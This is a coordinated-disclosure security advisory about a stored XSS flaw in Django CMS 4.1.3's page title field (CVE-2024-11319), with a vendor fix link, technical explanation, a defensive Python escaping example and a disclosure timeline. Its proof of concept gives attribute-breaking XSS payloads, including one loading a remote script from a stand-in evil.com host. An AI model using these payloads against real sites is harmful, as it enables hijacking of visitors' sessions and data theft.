iltosec

Django CMS 4.1.3 Stored XSS Vulnerability: Exploiting the Page Title Field

Security Update: Issue Fixed

The fix for this vulnerability has been committed here:
https://github.com/django-cms/django-cms/commit/241d1cbe47a68f5d271ce4d27ad5e32e2c360ec3

Vendor Advisory:

https://www.django-cms.org/en/blog/2024/11/13/django-cms-security-update/

Django CMS version 4.1.3 is affected by a stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject arbitrary JavaScript code that is executed in the context of the web application, potentially compromising the safety of all users visiting the affected page.

CVE-ID: CVE-2024-11319

CVSS Score:

CVSS v3.1 Base Score: 3.8 (Low)

Affected Versions:

Vulnerability Summary:

A stored XSS vulnerability was identified in Django CMS 4.1.3. It occurs in the Page Title field of the Page Creation interface under the /admin/cms/pagecontent/ endpoint. This vulnerability allows an attacker to inject JavaScript into the title, which will later be rendered in the page context, causing the injected code to execute when a user visits the affected page.

Technical Details:

The page title is rendered into the og:title meta tag of the public page through the page_attribute template tag:

<meta property="og:title" content="{% page_attribute "page_title" %}"/>

When a user with admin access creates or edits a page, whatever is entered in the Page Title field is stored in the database and later inserted into this attribute without sanitization or output encoding. A title containing a double quote can therefore terminate the content attribute and introduce new markup, which lets an attacker execute arbitrary JavaScript in the browser of any user visiting the page.

Proof of Concept:

  1. Log in as an admin-level user.
  2. Navigate to /admin/cms/pagecontent/ to create a new page.
  3. In the Page Title field, input the following payload:
    • "><img src=x onerror=alert('iltosec') any
  4. Save the page.
  5. When visiting the public page, the JavaScript code executes, displaying an alert with the message 'iltosec'.

Alternatively, an attacker could use a payload like:

    • "><script src="http://evil.com/xss.js"> iltosec

This would load and execute a malicious script hosted on an external server, compromising the visitor's session or exfiltrating data.
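The following is an added example; it is not code from this post and not django CMS's own code. It models the og:title sink from the Technical Details section as a plain Python string template, renders the first proof-of-concept payload both verbatim (the defect) and with HTML attribute escaping from Python's html.escape (the hardened behaviour), and then tokenizes each result with the standard library's HTMLParser to show what a browser-style tokenizer sees: an extra img element carrying an onerror handler in the first case, a single meta tag whose content attribute holds the title as data in the second. The function and class names are the example's own, and nothing here depends on Django being installed.

```python
# Added example (not from the post, not django CMS code): model of the
# og:title sink, rendered verbatim vs. with attribute escaping, then
# tokenized to show what markup each rendering actually produces.
from html import escape
from html.parser import HTMLParser

# Constructed input: the first payload from the proof of concept.
PAYLOAD = "\"><img src=x onerror=alert('iltosec') any"


def render_og_title(title: str, encode_output: bool) -> str:
    """Model of <meta property="og:title" content="..."/>.

    encode_output=False inserts the title verbatim, which is the defect.
    encode_output=True applies html.escape with quote=True, so '"', "'",
    '<', '>' and '&' become entities and the value can neither close the
    content attribute nor open a new tag.
    """
    value = escape(title, quote=True) if encode_output else title
    return f'<meta property="og:title" content="{value}"/>'


class _StartTagCollector(HTMLParser):
    """Record every start tag (with its attributes) the tokenizer sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser routes self-closing tags (<.../>) here as well, and it
        # has already decoded entities inside attribute values.
        self.tags.append((tag, dict(attrs)))


def parse_tags(fragment: str) -> list[tuple[str, dict]]:
    """Tokenize an HTML fragment into [(tag_name, {attr: value}), ...]."""
    collector = _StartTagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def injected_elements(fragment: str) -> list[str]:
    """Findings for a fragment that should contain exactly one <meta>:
    every other element name, plus every on* event-handler attribute as
    'tag@attr'. An empty list means the title stayed inside the attribute."""
    findings = []
    for tag, attrs in parse_tags(fragment):
        if tag != "meta":
            findings.append(tag)
        findings.extend(f"{tag}@{name}" for name in attrs if name.startswith("on"))
    return findings


if __name__ == "__main__":
    for encode in (False, True):
        rendered = render_og_title(PAYLOAD, encode)
        print("encoded " if encode else "verbatim", "->", rendered)
        print("  findings:", injected_elements(rendered))
```

The verbatim rendering yields findings for an img element and its onerror attribute; the escaped rendering yields none, and parse_tags shows the original title recovered intact as the value of the content attribute, which is the behaviour a correct fix has to produce. Feeding the second payload from the post through the same functions produces a script element finding in the same way. The general point the model illustrates is that in Django templates only {{ variable }} output is autoescaped; the string a custom template tag node returns is inserted as-is unless the tag escapes it, which is what the encode_output=True branch stands in for.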

Remediation:

Timeline:

Date         Status
09-NOV-2024  Reported to vendor
12-NOV-2024  Vendor acknowledgement
12-NOV-2024  Vulnerability fixed
13-NOV-2024  Patch available
18-NOV-2024  Public disclosure
